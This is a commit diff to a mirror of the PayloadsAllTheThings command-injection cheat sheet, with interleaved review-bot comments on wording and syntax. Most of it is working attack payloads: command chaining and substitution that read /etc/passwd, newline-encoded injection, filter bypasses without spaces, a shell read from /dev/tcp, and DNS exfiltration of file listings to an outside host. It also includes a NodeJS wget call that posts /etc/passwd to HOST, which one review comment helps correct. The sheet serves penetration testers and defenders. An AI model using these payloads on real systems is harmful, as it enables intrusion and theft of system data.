mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git, synced 2024-12-23 04:46:10 +00:00
Command Exec - ``, $() and more bypasses
parent e7cb8a2ce1
commit 278a130940
@ -1,9 +1,9 @@
|
|||||||
# Remote Code Execution
|
# Remote Commands Execution
|
||||||
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
|
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
|
||||||
|
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
Normal code execution, execute the command and voila :p
|
Normal Commands execution, execute the command and voila :p
|
||||||
```
|
```
|
||||||
cat /etc/passwd
|
cat /etc/passwd
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
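Review bot: the rename in the heading and the first sentence introduces the typo "Commandss" and the capitalised plural "Remote Commands Execution" / "Commands execution"; the idiomatic form is singular. Suggest `# Remote Command Execution` and `Remote command execution is a security vulnerability that allows an attacker to execute arbitrary commands on the vulnerable server.`; the "from a remote server" wording carried over from the old sentence describes where the attacker sits rather than where the injected commands run, which is the point the intro should make. The `## Exploits` lead-in in the same hunk should likewise read "Normal command execution".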
@ -12,15 +12,20 @@ bin:x:2:2:bin:/bin:/bin/sh
|
|||||||
sys:x:3:3:sys:/dev:/bin/sh
|
sys:x:3:3:sys:/dev:/bin/sh
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution by chaining commands
|
Commands execution by chaining commands
|
||||||
```
|
```
|
||||||
original_cmd_by_server; ls
|
original_cmd_by_server; ls
|
||||||
original_cmd_by_server && ls
|
original_cmd_by_server && ls
|
||||||
original_cmd_by_server | ls
|
original_cmd_by_server | ls
|
||||||
original_cmd_by_server `ls`
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution without space - Linux
|
Commands execution inside a command
|
||||||
|
```
|
||||||
|
original_cmd_by_server `cat /etc/passwd`
|
||||||
|
original_cmd_by_server $(cat /etc/passwd)
|
||||||
|
```
|
||||||
|
|
||||||
|
Commands execution without space - Linux
|
||||||
```
|
```
|
||||||
swissky@crashlab:~/Www$ cat</etc/passwd
|
swissky@crashlab:~/Www$ cat</etc/passwd
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
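Review bot: the backtick line added to the chaining block (`` original_cmd_by_server `ls` ``) duplicates the new "Commands execution inside a command" section directly below it, and backticks are command substitution rather than chaining, so they belong with `$()` in that section, not in the `;` / `&&` / `|` list. Suggest dropping the extra line from the chaining block and keeping both substitution forms (`` `cat /etc/passwd` `` and `$(cat /etc/passwd)`) in the new section, with its heading changed to "Command execution inside a command" for consistency with the rest of the file; the "Commands execution without space - Linux" heading in this hunk carries the same plural.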
@ -44,18 +49,23 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
|
|||||||
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution without space - Windows
|
Commands execution without space - Windows
|
||||||
```
|
```
|
||||||
ping%CommonProgramFiles:~10,-18%IP
|
ping%CommonProgramFiles:~10,-18%IP
|
||||||
ping%PROGRAMFILES:~10,-5%IP
|
ping%PROGRAMFILES:~10,-5%IP
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
Code execution without spaces, $ or { } - Linux (Bash only)
|
Commands execution without spaces, $ or { } - Linux (Bash only)
|
||||||
```
|
```
|
||||||
IFS=,;`cat<<<uname,-a`
|
IFS=,;`cat<<<uname,-a`
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Commands execution with a line return
|
||||||
|
```
|
||||||
|
something%0Acat%20/etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
## Time based data exfiltration
|
## Time based data exfiltration
|
||||||
Extracting data : char by char
|
Extracting data : char by char
|
||||||
```
|
```
|
||||||
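Review bot: the new "Commands execution with a line return" example `something%0Acat%20/etc/passwd` is URL-encoded (`%0A` is the newline, `%20` a space) while every other snippet in this file is the raw shell form, so a reader may not see that the technique is simply a newline acting as a command separator. Suggest either showing the raw form (a literal line break before `cat /etc/passwd`) or adding a sentence stating that the example is shown URL-encoded as it would be sent in an HTTP parameter. The renamed headings in this hunk ("Commands execution without space - Windows", "Commands execution without spaces, $ or { } - Linux (Bash only)") should use the singular "Command execution".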
@ -80,7 +90,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
|||||||
```
|
```
|
||||||
|
|
||||||
## Environment based
|
## Environment based
|
||||||
NodeJS Code execution
|
NodeJS Commands execution
|
||||||
```
|
```
|
||||||
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
||||||
```
|
```
|
||||||
|
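Review bot: "NodeJS Commands execution" has the same plural as the other renamed headings; "NodeJS command execution" reads correctly. While touching this line, the unchanged `require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')` beneath it still has `+` characters where the wget invocation needs spaces (`wget --post-data "x=$(cat /etc/passwd)" HOST`); they look like leftover form-encoded spaces and wget will not parse the option as intended, so it is worth fixing in the same commit or a follow-up.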